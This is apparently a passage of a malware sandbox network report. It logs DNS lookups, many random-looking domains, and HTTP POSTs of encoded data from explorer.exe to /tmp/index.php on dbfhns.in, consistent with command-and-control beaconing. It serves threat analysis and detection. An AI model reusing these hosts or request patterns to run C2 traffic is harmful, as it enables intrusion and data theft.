May 26, 2024 10:32:42.026909113 CEST	49777	80	192.168.2.5	190.187.52.42
May 26, 2024 10:32:42.026910067 CEST	49777	80	192.168.2.5	190.187.52.42
May 26, 2024 10:32:42.080452919 CEST	80	49777	190.187.52.42	192.168.2.5
May 26, 2024 10:32:49.175688028 CEST	49778	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:49.228626013 CEST	80	49778	88.225.215.104	192.168.2.5
May 26, 2024 10:32:49.228715897 CEST	49778	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:49.228873968 CEST	49778	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:49.228907108 CEST	49778	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:49.280397892 CEST	80	49778	88.225.215.104	192.168.2.5
May 26, 2024 10:32:49.332567930 CEST	80	49778	88.225.215.104	192.168.2.5
May 26, 2024 10:32:50.206007004 CEST	80	49778	88.225.215.104	192.168.2.5
May 26, 2024 10:32:50.211214066 CEST	80	49778	88.225.215.104	192.168.2.5
May 26, 2024 10:32:50.211397886 CEST	49778	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:50.211397886 CEST	49778	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:50.264620066 CEST	80	49778	88.225.215.104	192.168.2.5
May 26, 2024 10:32:54.132256031 CEST	49779	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:54.137475967 CEST	80	49779	88.225.215.104	192.168.2.5
May 26, 2024 10:32:54.137566090 CEST	49779	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:54.137737989 CEST	49779	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:54.137788057 CEST	49779	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:54.192514896 CEST	80	49779	88.225.215.104	192.168.2.5
May 26, 2024 10:32:54.243464947 CEST	80	49779	88.225.215.104	192.168.2.5
May 26, 2024 10:32:55.081934929 CEST	80	49779	88.225.215.104	192.168.2.5
May 26, 2024 10:32:55.086663008 CEST	80	49779	88.225.215.104	192.168.2.5
May 26, 2024 10:32:55.086879015 CEST	49779	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:55.086879015 CEST	49779	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:55.140378952 CEST	80	49779	88.225.215.104	192.168.2.5
May 26, 2024 10:32:59.089806080 CEST	49780	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:59.094944954 CEST	80	49780	88.225.215.104	192.168.2.5
May 26, 2024 10:32:59.095006943 CEST	49780	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:59.095133066 CEST	49780	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:59.095155954 CEST	49780	80	192.168.2.5	88.225.215.104
May 26, 2024 10:32:59.148611069 CEST	80	49780	88.225.215.104	192.168.2.5
May 26, 2024 10:32:59.199331999 CEST	80	49780	88.225.215.104	192.168.2.5
May 26, 2024 10:33:00.067755938 CEST	80	49780	88.225.215.104	192.168.2.5
May 26, 2024 10:33:00.072474003 CEST	80	49780	88.225.215.104	192.168.2.5
May 26, 2024 10:33:00.072536945 CEST	49780	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:01.339006901 CEST	49780	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:01.347573042 CEST	80	49780	88.225.215.104	192.168.2.5
May 26, 2024 10:33:05.575340033 CEST	49781	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:05.584036112 CEST	80	49781	88.225.215.104	192.168.2.5
May 26, 2024 10:33:05.584177971 CEST	49781	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:05.584328890 CEST	49781	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:05.584328890 CEST	49781	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:05.640731096 CEST	80	49781	88.225.215.104	192.168.2.5
May 26, 2024 10:33:05.691417933 CEST	80	49781	88.225.215.104	192.168.2.5
May 26, 2024 10:33:06.552989960 CEST	80	49781	88.225.215.104	192.168.2.5
May 26, 2024 10:33:06.557902098 CEST	80	49781	88.225.215.104	192.168.2.5
May 26, 2024 10:33:06.558222055 CEST	49781	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:06.558223009 CEST	49781	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:06.612508059 CEST	80	49781	88.225.215.104	192.168.2.5
May 26, 2024 10:33:10.597477913 CEST	49782	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:10.602669954 CEST	80	49782	88.225.215.104	192.168.2.5
May 26, 2024 10:33:10.602796078 CEST	49782	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:10.602930069 CEST	49782	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:10.602962017 CEST	49782	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:10.656492949 CEST	80	49782	88.225.215.104	192.168.2.5
May 26, 2024 10:33:10.707376003 CEST	80	49782	88.225.215.104	192.168.2.5
May 26, 2024 10:33:11.670233965 CEST	80	49782	88.225.215.104	192.168.2.5
May 26, 2024 10:33:11.675147057 CEST	80	49782	88.225.215.104	192.168.2.5
May 26, 2024 10:33:11.675177097 CEST	80	49782	88.225.215.104	192.168.2.5
May 26, 2024 10:33:11.675219059 CEST	49782	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:11.675220013 CEST	49782	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:11.675301075 CEST	49782	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:11.728699923 CEST	80	49782	88.225.215.104	192.168.2.5
May 26, 2024 10:33:15.556857109 CEST	49783	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:15.562064886 CEST	80	49783	88.225.215.104	192.168.2.5
May 26, 2024 10:33:15.562160969 CEST	49783	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:15.562340021 CEST	49783	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:15.562364101 CEST	49783	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:15.618961096 CEST	80	49783	88.225.215.104	192.168.2.5
May 26, 2024 10:33:15.667375088 CEST	80	49783	88.225.215.104	192.168.2.5
May 26, 2024 10:33:16.535130024 CEST	80	49783	88.225.215.104	192.168.2.5
May 26, 2024 10:33:16.540126085 CEST	80	49783	88.225.215.104	192.168.2.5
May 26, 2024 10:33:16.540179968 CEST	49783	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:16.540632963 CEST	49783	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:16.592400074 CEST	80	49783	88.225.215.104	192.168.2.5
May 26, 2024 10:33:21.916846037 CEST	49784	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:21.922759056 CEST	80	49784	88.225.215.104	192.168.2.5
May 26, 2024 10:33:21.922851086 CEST	49784	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:21.922976971 CEST	49784	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:21.922993898 CEST	49784	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:21.977263927 CEST	80	49784	88.225.215.104	192.168.2.5
May 26, 2024 10:33:22.027403116 CEST	80	49784	88.225.215.104	192.168.2.5
May 26, 2024 10:33:23.141372919 CEST	80	49784	88.225.215.104	192.168.2.5
May 26, 2024 10:33:23.146317959 CEST	80	49784	88.225.215.104	192.168.2.5
May 26, 2024 10:33:23.146399975 CEST	49784	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:23.146483898 CEST	49784	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:23.197088003 CEST	80	49784	88.225.215.104	192.168.2.5
May 26, 2024 10:33:26.669018030 CEST	49785	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:26.674577951 CEST	80	49785	88.225.215.104	192.168.2.5
May 26, 2024 10:33:26.674813986 CEST	49785	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:26.674968958 CEST	49785	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:26.674968958 CEST	49785	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:26.733277082 CEST	80	49785	88.225.215.104	192.168.2.5
May 26, 2024 10:33:26.779661894 CEST	80	49785	88.225.215.104	192.168.2.5
May 26, 2024 10:33:27.631942034 CEST	80	49785	88.225.215.104	192.168.2.5
May 26, 2024 10:33:27.636636019 CEST	80	49785	88.225.215.104	192.168.2.5
May 26, 2024 10:33:27.636833906 CEST	49785	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:27.636833906 CEST	49785	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:27.688766003 CEST	80	49785	88.225.215.104	192.168.2.5
May 26, 2024 10:33:31.544528008 CEST	49786	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:31.550345898 CEST	80	49786	88.225.215.104	192.168.2.5
May 26, 2024 10:33:31.550440073 CEST	49786	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:31.550599098 CEST	49786	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:31.550621986 CEST	49786	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:31.600728989 CEST	80	49786	88.225.215.104	192.168.2.5
May 26, 2024 10:33:31.647768974 CEST	80	49786	88.225.215.104	192.168.2.5
May 26, 2024 10:33:32.494678974 CEST	80	49786	88.225.215.104	192.168.2.5
May 26, 2024 10:33:32.499876976 CEST	80	49786	88.225.215.104	192.168.2.5
May 26, 2024 10:33:32.500092983 CEST	49786	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:32.500570059 CEST	49786	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:32.553055048 CEST	80	49786	88.225.215.104	192.168.2.5
May 26, 2024 10:33:38.551656008 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:38.557228088 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:38.557334900 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:38.557470083 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:38.557492971 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:38.608664989 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:38.656033039 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:40.434873104 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:40.440402031 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:40.440453053 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:40.440481901 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:40.440504074 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:40.440512896 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:40.440551043 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:40.440551043 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:40.440562963 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:40.440608978 CEST	49787	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:40.493431091 CEST	80	49787	88.225.215.104	192.168.2.5
May 26, 2024 10:33:44.421263933 CEST	49788	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:44.583611012 CEST	80	49788	88.225.215.104	192.168.2.5
May 26, 2024 10:33:44.583717108 CEST	49788	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:44.583910942 CEST	49788	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:44.583935976 CEST	49788	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:44.610299110 CEST	80	49788	88.225.215.104	192.168.2.5
May 26, 2024 10:33:44.655961037 CEST	80	49788	88.225.215.104	192.168.2.5
May 26, 2024 10:33:45.554656029 CEST	80	49788	88.225.215.104	192.168.2.5
May 26, 2024 10:33:45.559694052 CEST	80	49788	88.225.215.104	192.168.2.5
May 26, 2024 10:33:45.559928894 CEST	49788	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:45.560185909 CEST	49788	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:45.612946987 CEST	80	49788	88.225.215.104	192.168.2.5
May 26, 2024 10:33:50.608783007 CEST	49789	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:50.614839077 CEST	80	49789	88.225.215.104	192.168.2.5
May 26, 2024 10:33:50.615024090 CEST	49789	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:50.615201950 CEST	49789	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:50.615231037 CEST	49789	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:50.672179937 CEST	80	49789	88.225.215.104	192.168.2.5
May 26, 2024 10:33:50.720000982 CEST	80	49789	88.225.215.104	192.168.2.5
May 26, 2024 10:33:51.583678007 CEST	80	49789	88.225.215.104	192.168.2.5
May 26, 2024 10:33:51.588460922 CEST	80	49789	88.225.215.104	192.168.2.5
May 26, 2024 10:33:51.588612080 CEST	49789	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:51.751740932 CEST	49789	80	192.168.2.5	88.225.215.104
May 26, 2024 10:33:51.758785963 CEST	80	49789	88.225.215.104	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 26, 2024 10:30:16.677725077 CEST	62211	53	192.168.2.5	1.1.1.1
May 26, 2024 10:30:17.591068029 CEST	53	62211	1.1.1.1	192.168.2.5
May 26, 2024 10:30:28.747459888 CEST	63577	53	192.168.2.5	1.1.1.1
May 26, 2024 10:30:28.762993097 CEST	53	63577	1.1.1.1	192.168.2.5
May 26, 2024 10:31:00.824383020 CEST	60332	53	192.168.2.5	1.1.1.1
May 26, 2024 10:31:00.832545042 CEST	53	60332	1.1.1.1	192.168.2.5
May 26, 2024 10:32:48.122504950 CEST	63736	53	192.168.2.5	1.1.1.1
May 26, 2024 10:32:49.135556936 CEST	63736	53	192.168.2.5	1.1.1.1
May 26, 2024 10:32:49.174972057 CEST	53	63736	1.1.1.1	192.168.2.5
May 26, 2024 10:32:49.179728985 CEST	53	63736	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 26, 2024 10:30:16.677725077 CEST	192.168.2.5	1.1.1.1	0xe312	Standard query (0)	dbfhns.in	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:28.747459888 CEST	192.168.2.5	1.1.1.1	0xd3f4	Standard query (0)	whispedwoodmoodsksl.shop	A (IP address)	IN (0x0001)	false
May 26, 2024 10:31:00.824383020 CEST	192.168.2.5	1.1.1.1	0x234c	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:48.122504950 CEST	192.168.2.5	1.1.1.1	0x235	Standard query (0)	dbfhns.in	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.135556936 CEST	192.168.2.5	1.1.1.1	0x235	Standard query (0)	dbfhns.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	190.187.52.42	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	211.119.84.111	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	2.185.214.11	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	201.191.99.134	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	31.176.197.47	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	92.36.226.66	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	220.82.134.210	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	181.47.131.246	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	189.61.54.32	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:17.591068029 CEST	1.1.1.1	192.168.2.5	0xe312	No error (0)	dbfhns.in	109.175.29.39	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:28.762993097 CEST	1.1.1.1	192.168.2.5	0xd3f4	No error (0)	whispedwoodmoodsksl.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
May 26, 2024 10:30:28.762993097 CEST	1.1.1.1	192.168.2.5	0xd3f4	No error (0)	whispedwoodmoodsksl.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
May 26, 2024 10:31:00.832545042 CEST	1.1.1.1	192.168.2.5	0x234c	No error (0)	steamcommunity.com	23.67.133.187	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	88.225.215.104	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	211.181.24.133	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	95.86.30.3	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	84.252.15.104	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	116.58.10.59	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	211.181.24.132	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	190.28.110.209	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	187.134.55.166	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	186.101.193.110	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.174972057 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	185.18.245.58	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	88.225.215.104	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	211.181.24.133	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	95.86.30.3	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	84.252.15.104	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	116.58.10.59	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	211.181.24.132	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	190.28.110.209	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	187.134.55.166	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	186.101.193.110	A (IP address)	IN (0x0001)	false
May 26, 2024 10:32:49.179728985 CEST	1.1.1.1	192.168.2.5	0x235	No error (0)	dbfhns.in	185.18.245.58	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

whispedwoodmoodsksl.shop

steamcommunity.com

65.109.242.59

jcnkksjnacxjwh.org

dbfhns.in

eaaqpotuqgvxxvep.com

eskqecavndurqirx.net

pvhxcowxrsmsmxv.com

xhkcnscxetvodwbe.org

wmdyxmgpkfrir.org

45.129.96.86

qsvttmlmwckhyv.net

fmxjggdvslwul.org

dsnbbvyutqhm.net

alfdwfnhtcwp.net

23.145.40.124

185.235.137.54

utrnyeeydifgj.com

kyidhbcjdpvriid.com

91.202.233.231

cqkwdxujhjkjfbp.org

ahlpadnysdsadbk.com

mqdfdnedidrxaed.com

mdrbuklfbrraj.org

xmvygvmqskvs.net

efeegeullncj.net

bduckycvwfnemtxt.net

ejfrahknvjij.net

qmlyvkkabycy.org

ddteakwbikxqkc.org

ovxmwniqpjexkcks.net

qvvhbwqetcr.net

umfomwabnghpfpsy.org

frlbymqtkyyc.com

bmuwkpviysjlmpaf.com

olwhnfqjomykugd.net

sgvkxotchkel.com

oosdileuucnskppc.com

caudwrxwdlvda.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:17.597892046 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jcnkksjnacxjwh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: dbfhns.in
May 26, 2024 10:30:17.597928047 CEST	150	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 37 45 ab 84 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA .[k,vu7E?mF_SB0`lMGvU-P+MwUUIvAev
May 26, 2024 10:30:18.736025095 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:18.841634989 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eaaqpotuqgvxxvep.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: dbfhns.in
May 26, 2024 10:30:18.841655970 CEST	363	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 2b 48 a7 b7 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vu+Hw.ZKg(6VOf2Nm\|hAz?1JBst}KV %WBC~2fCPx3Q}x}iL
May 26, 2024 10:30:20.036725044 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 10:30:20.143671989 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eskqecavndurqirx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 252 Host: dbfhns.in
May 26, 2024 10:30:20.143706083 CEST	252	OUT	Data Raw: 3b 6e 58 10 f0 bf 68 23 d7 ad b7 04 77 09 7a bc 7d 0e b9 93 6b 00 93 6b 00 7b 09 e0 46 ca c6 6f ea 5d ce 20 76 1d 23 1b ed 9c 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 3e 1b b9 e6 Data Ascii: ;nXh#wz}kk{Fo] v#?#1\|J7 M@NA -[k,vu>VZw1v(.(iXVOQGV;:6.G=Mn+B[j>y'R5!%Zs{`,I\|q<k
May 26, 2024 10:30:21.289721966 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 26 May 2024 08:30:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
